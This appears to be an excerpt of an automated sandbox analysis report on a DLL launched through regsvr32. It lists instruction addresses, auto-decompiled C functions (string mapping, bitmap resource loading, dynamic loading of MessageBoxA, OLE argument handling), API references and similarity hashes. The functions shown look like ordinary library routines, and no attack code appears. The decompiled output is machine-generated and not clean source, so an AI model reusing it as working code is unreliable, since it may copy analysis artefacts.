                                                                                                            0x100180c3
                                                                                                            0x100180c5
                                                                                                            0x100180c5
                                                                                                            0x100180b2
                                                                                                            0x100180b2
                                                                                                            0x100180b2
                                                                                                            0x100180b0
                                                                                                            0x100180d2
                                                                                                            0x100180ef
                                                                                                            0x100180ef
                                                                                                            0x100180f7
                                                                                                            0x100182d9
                                                                                                            0x100182dc
                                                                                                            0x100182de
                                                                                                            0x100182e1
                                                                                                            0x100182e4
                                                                                                            0x100182e6
                                                                                                            0x100182eb
                                                                                                            0x100182eb
                                                                                                            0x100182ee
                                                                                                            0x100182f1
                                                                                                            0x100182f3
                                                                                                            0x100182f8
                                                                                                            0x100182f8
                                                                                                            0x100182fe
                                                                                                            0x10018304
                                                                                                            0x10018307
                                                                                                            0x1001830a
                                                                                                            0x10018313
                                                                                                            0x10018316
                                                                                                            0x10018422
                                                                                                            0x10018424
                                                                                                            0x10018424
                                                                                                            0x10018427
                                                                                                            0x10018429
                                                                                                            0x1001842c
                                                                                                            0x10018431
                                                                                                            0x10018432
                                                                                                            0x00000000
                                                                                                            0x10018432
                                                                                                            0x1001831c
                                                                                                            0x1001831d
                                                                                                            0x1001831e
                                                                                                            0x10018321
                                                                                                            0x10018322
                                                                                                            0x10018325
                                                                                                            0x10018326
                                                                                                            0x10018329
                                                                                                            0x1001832e
                                                                                                            0x10018331
                                                                                                            0x10018334
                                                                                                            0x10018336
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001834a
                                                                                                            0x1001834c
                                                                                                            0x1001834f
                                                                                                            0x10018351
                                                                                                            0x100183f9
                                                                                                            0x100183fc
                                                                                                            0x100183fc
                                                                                                            0x100183ff
                                                                                                            0x10018401
                                                                                                            0x10018402
                                                                                                            0x10018407
                                                                                                            0x00000000
                                                                                                            0x100183ff
                                                                                                            0x10018357
                                                                                                            0x10018360
                                                                                                            0x10018365
                                                                                                            0x10018368
                                                                                                            0x1001836a
                                                                                                            0x10018370
                                                                                                            0x10018375
                                                                                                            0x1001838a
                                                                                                            0x1001838e
                                                                                                            0x10018390
                                                                                                            0x100183b5
                                                                                                            0x100183c5
                                                                                                            0x100183cb
                                                                                                            0x100183ce
                                                                                                            0x100183d0
                                                                                                            0x100183d6
                                                                                                            0x100183d9
                                                                                                            0x100183df
                                                                                                            0x100183e0
                                                                                                            0x100183e1
                                                                                                            0x100183e4
                                                                                                            0x100183e7
                                                                                                            0x100183f3
                                                                                                            0x100183f5
                                                                                                            0x00000000
                                                                                                            0x100183f5
                                                                                                            0x00000000
                                                                                                            0x10018392
                                                                                                            0x1001839b
                                                                                                            0x1001839d
                                                                                                            0x1001839f
                                                                                                            0x100183d2
                                                                                                            0x100183d2
                                                                                                            0x00000000
                                                                                                            0x100183d2
                                                                                                            0x100183a6
                                                                                                            0x100183ab
                                                                                                            0x100183ae
                                                                                                            0x00000000
                                                                                                            0x100183ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018105
                                                                                                            0x10018108
                                                                                                            0x1001830c
                                                                                                            0x1001830c
                                                                                                            0x10018434
                                                                                                            0x1001843c
                                                                                                            0x1001843c
                                                                                                            0x1001810e
                                                                                                            0x10018110
                                                                                                            0x10018113
                                                                                                            0x10018116
                                                                                                            0x1001811c
                                                                                                            0x1001811e
                                                                                                            0x10018123
                                                                                                            0x10018123
                                                                                                            0x10018147
                                                                                                            0x10018149
                                                                                                            0x1001814e
                                                                                                            0x00000000
                                                                                                            0x10018154
                                                                                                            0x10018154
                                                                                                            0x10018164
                                                                                                            0x10018169
                                                                                                            0x1001816e
                                                                                                            0x10018171
                                                                                                            0x10018195
                                                                                                            0x100181b3
                                                                                                            0x100181ca
                                                                                                            0x100182b6
                                                                                                            0x100182b6
                                                                                                            0x100182b9
                                                                                                            0x100182bb
                                                                                                            0x100182be
                                                                                                            0x100182c3
                                                                                                            0x100182c4
                                                                                                            0x100182c7
                                                                                                            0x100182c9
                                                                                                            0x100182cc
                                                                                                            0x100182d1
                                                                                                            0x100182d2
                                                                                                            0x00000000
                                                                                                            0x100182d2
                                                                                                            0x100181e2
                                                                                                            0x100181e4
                                                                                                            0x100181e9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181f3
                                                                                                            0x10018222
                                                                                                            0x10018232
                                                                                                            0x10018237
                                                                                                            0x1001823c
                                                                                                            0x1001823f
                                                                                                            0x10018260
                                                                                                            0x10018263
                                                                                                            0x1001827d
                                                                                                            0x10018291
                                                                                                            0x10018293
                                                                                                            0x10018295
                                                                                                            0x10018296
                                                                                                            0x10018297
                                                                                                            0x1001829a
                                                                                                            0x100182a0
                                                                                                            0x100182a3
                                                                                                            0x1001829c
                                                                                                            0x1001829c
                                                                                                            0x1001829d
                                                                                                            0x1001829d
                                                                                                            0x100182b4
                                                                                                            0x100182b4
                                                                                                            0x00000000
                                                                                                            0x10018265
                                                                                                            0x10018269
                                                                                                            0x1001826f
                                                                                                            0x10018272
                                                                                                            0x10018274
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x00000000
                                                                                                            0x10018276
                                                                                                            0x10018263
                                                                                                            0x100181f8
                                                                                                            0x10018217
                                                                                                            0x10018217
                                                                                                            0x00000000
                                                                                                            0x10018197
                                                                                                            0x1001819b
                                                                                                            0x100181a0
                                                                                                            0x100181a1
                                                                                                            0x100181a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x00000000
                                                                                                            0x100181ac
                                                                                                            0x10018195
                                                                                                            0x1001814e
                                                                                                            0x100180f7
                                                                                                            0x100180d4
                                                                                                            0x100180d7
                                                                                                            0x100180da
                                                                                                            0x100180da
                                                                                                            0x100180dd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180df
                                                                                                            0x100180e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x00000000
                                                                                                            0x100180e4
                                                                                                            0x100180ec
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                                                            • GetLastError.KERNEL32 ref: 100180BA
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1775797328-4125583295
                                                                                                            • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                                                            • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                                                            • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002B597 Relevance: 21.1, APIs: 14, Instructions: 136windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t54;
				signed int _t56;
				struct HDC__* _t65;
				struct HBITMAP__* _t66;
				struct HDC__* _t70;
				void* _t78;
				int* _t80;
				int _t81;
				signed int _t84;
				signed int _t89;
				void* _t102;
				struct HDC__* _t103;
				BITMAPINFO* _t105;

				_t53 = LoadResource(_a4, _a8);
				_v20 = _t53;
				if(_t53 == 0) {
					return _t53;
				}
				_t54 = LockResource(_t53);
				_t78 = _t54;
				_v12 = _t78;
				if(_t78 == 0) {
					L17:
					return _t54;
				}
				_t99 =  *_t78 + 0x40;
				_t54 = E100107B6( *_t78 + 0x40);
				_t105 = _t54;
				if(_t105 == 0) {
					L16:
					goto L17;
				} else {
					E10011440(_t105, _t78, _t99);
					_t102 = _t105 + _t105->bmiHeader;
					_a8 = _a8 & 0x00000000;
					do {
						_t84 =  *(_t102 + _a8 * 4);
						_t56 = 0;
						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
							_t56 = _t56 + 1;
							if(_t56 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t80 = 0x1003f064 + _t56 * 8;
							_v8 = _t80;
							_a4 = GetSysColor( *_t80) & 0x000000ff;
							_a4 = GetSysColor( *_t80) << 8;
							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
							__eflags = _t89;
							 *(_t102 + _a8 * 4) = _t89;
						} else {
							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
							if(__eflags != 0) {
								 *(_t102 + _a8 * 4) = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t103 = _t105->bmiHeader.biWidth;
					_t81 = _t105->bmiHeader.biHeight;
					_a4 = _t103;
					_a8 = _t81;
					_t65 = GetDC(0);
					_a12 = _t65;
					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
					_v8 = _t66;
					if(_t66 != 0) {
						_t70 = CreateCompatibleDC(_a12);
						_t81 = SelectObject;
						_t103 = _t70;
						_v16 = SelectObject(_t103, _v8);
						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
						SelectObject(_t103, _v16);
						DeleteDC(_t103);
					}
					ReleaseDC(0, _a12);
					_push(_t105);
					E100107C8(_t81, _t103, _t105, 0);
					FreeResource(_v20);
					_t54 = _v8;
					goto L16;
				}
			}

























                                                                                                            0x1002b5a3
                                                                                                            0x1002b5ab
                                                                                                            0x1002b5ae
                                                                                                            0x1002b71c
                                                                                                            0x1002b71c
                                                                                                            0x1002b5b6
                                                                                                            0x1002b5bc
                                                                                                            0x1002b5c0
                                                                                                            0x1002b5c3
                                                                                                            0x1002b71a
                                                                                                            0x00000000
                                                                                                            0x1002b71a
                                                                                                            0x1002b5cd
                                                                                                            0x1002b5d1
                                                                                                            0x1002b5d6
                                                                                                            0x1002b5db
                                                                                                            0x1002b718
                                                                                                            0x00000000
                                                                                                            0x1002b5e1
                                                                                                            0x1002b5e4
                                                                                                            0x1002b5ee
                                                                                                            0x1002b5f0
                                                                                                            0x1002b5f4
                                                                                                            0x1002b5f7
                                                                                                            0x1002b5fa
                                                                                                            0x1002b5fc
                                                                                                            0x1002b605
                                                                                                            0x1002b609
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002b60b
                                                                                                            0x1002b60d
                                                                                                            0x1002b611
                                                                                                            0x1002b629
                                                                                                            0x1002b632
                                                                                                            0x1002b640
                                                                                                            0x1002b655
                                                                                                            0x1002b667
                                                                                                            0x1002b667
                                                                                                            0x1002b66c
                                                                                                            0x1002b613
                                                                                                            0x1002b613
                                                                                                            0x1002b61b
                                                                                                            0x1002b620
                                                                                                            0x1002b620
                                                                                                            0x1002b61b
                                                                                                            0x1002b66f
                                                                                                            0x1002b66f
                                                                                                            0x1002b672
                                                                                                            0x1002b67c
                                                                                                            0x1002b67f
                                                                                                            0x1002b684
                                                                                                            0x1002b687
                                                                                                            0x1002b68a
                                                                                                            0x1002b693
                                                                                                            0x1002b696
                                                                                                            0x1002b69e
                                                                                                            0x1002b6a1
                                                                                                            0x1002b6a6
                                                                                                            0x1002b6af
                                                                                                            0x1002b6b5
                                                                                                            0x1002b6ca
                                                                                                            0x1002b6e7
                                                                                                            0x1002b6f1
                                                                                                            0x1002b6f4
                                                                                                            0x1002b6f4
                                                                                                            0x1002b6ff
                                                                                                            0x1002b705
                                                                                                            0x1002b706
                                                                                                            0x1002b70f
                                                                                                            0x1002b715
                                                                                                            0x00000000
                                                                                                            0x1002b715

                                                                                                            APIs
                                                                                                            • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B635
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B643
                                                                                                            • GetSysColor.USER32(00000000), ref: 1002B658
                                                                                                            • GetDC.USER32(00000000), ref: 1002B68A
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                                                            • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                                                            • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                                                            • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                                                            • ReleaseDC.USER32 ref: 1002B6FF
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                                                            • String ID:
                                                                                                            • API String ID: 2552574679-0
                                                                                                            • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                                                            • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019D1D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1004f824 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1004f830; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1004f828; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1004f82c; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1004f824(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1004f3ec < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1004f824 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1004f3e0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1004f834 = _t26;
						if(_t26 != 0) {
							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}















                                                                                                            0x10019d24
                                                                                                            0x10019d26
                                                                                                            0x10019d2e
                                                                                                            0x10019d9d
                                                                                                            0x10019d9d
                                                                                                            0x10019da4
                                                                                                            0x10019de2
                                                                                                            0x10019de2
                                                                                                            0x10019de9
                                                                                                            0x10019ded
                                                                                                            0x10019df1
                                                                                                            0x10019df3
                                                                                                            0x10019dfa
                                                                                                            0x10019dff
                                                                                                            0x10019dff
                                                                                                            0x10019dfa
                                                                                                            0x10019df1
                                                                                                            0x10019e01
                                                                                                            0x00000000
                                                                                                            0x10019e0b
                                                                                                            0x10019da6
                                                                                                            0x10019daa
                                                                                                            0x10019dc9
                                                                                                            0x10019dd0
                                                                                                            0x10019ddc
                                                                                                            0x10019dd2
                                                                                                            0x10019dd2
                                                                                                            0x10019dd2
                                                                                                            0x00000000
                                                                                                            0x10019dd0
                                                                                                            0x10019daf
                                                                                                            0x10019db0
                                                                                                            0x10019db5
                                                                                                            0x10019db6
                                                                                                            0x10019db8
                                                                                                            0x10019dc1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019dc1
                                                                                                            0x10019d3b
                                                                                                            0x10019d3f
                                                                                                            0x10019dd8
                                                                                                            0x00000000
                                                                                                            0x10019dd8
                                                                                                            0x10019d51
                                                                                                            0x10019d55
                                                                                                            0x10019d5a
                                                                                                            0x00000000
                                                                                                            0x10019d5c
                                                                                                            0x10019d6a
                                                                                                            0x10019d78
                                                                                                            0x10019d7d
                                                                                                            0x10019d85
                                                                                                            0x10019d89
                                                                                                            0x10019d8e
                                                                                                            0x10019d98
                                                                                                            0x10019d98
                                                                                                            0x10019d8e
                                                                                                            0x00000000
                                                                                                            0x10019d7d

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                            • API String ID: 2238633743-1612076079
                                                                                                            • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                                                            • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10039B26 Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 48%
                                                                                                            			E10039B26(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011BF0(0x1003b377, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10011C50(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F77E(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001CE3B(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
